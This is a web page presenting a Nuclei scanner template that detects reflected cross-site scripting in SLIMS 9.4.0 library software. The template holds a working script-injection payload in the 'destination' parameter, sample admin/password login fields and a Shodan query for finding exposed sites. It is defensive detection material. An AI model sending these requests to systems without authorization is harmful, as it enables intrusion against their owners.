Skip to content
Nuclei Templates

Senayan Library Management System v9.4.0(SLIMS 9) - Cross Site Scripting

ID: slims-xss

Severity: medium

Author: arafatansari

Tags: senayan,packetstorm,xss,slims

Description

Section titled “Description”

SLIMS 9 was discovered to contain destination request parameter that copies the value of an HTML tag attribute which is encapsulated in double quotation marks.

YAML Source

Section titled “YAML Source”
id: slims-xss


info:
  name: Senayan Library Management System v9.4.0(SLIMS 9) - Cross Site Scripting
  author: arafatansari
  severity: medium
  description: |
    SLIMS 9 was discovered to contain `destination` request parameter that copies the value of an HTML tag attribute which is encapsulated in double quotation marks.
  reference:
    - https://packetstormsecurity.com/files/170182/Senayan-Library-Management-System-9.4.0-Cross-Site-Scripting.html
  classification:
    cpe: cpe:2.3:a:slims:senayan_library_management_system:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: slims
    product: senayan_library_management_system
    shodan-query: http.html:"SLIMS"
  tags: senayan,packetstorm,xss,slims


http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&destination=zbuip%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ejgoihbmmygljgoihbmmygl&logMeIn=Login&memberID=admin&memberPassWord=password&p=member"


    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<script>alert(document.domain)</script>'
          - 'SLiMS'
        condition: and


      - type: word
        part: header
        words:
          - "text/html"


      - type: status
        status:
          - 200
# digest: 490a0046304402206df461475bad08749edc8d927ff4771f3b46c028bd9d826f46ffb06f7cc1ada90220233b828d6961dac0fbe9ec019aef45b7fa1d024fb36d0d1987654e16f99b1d0d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/slims-xss.yaml"

View on Github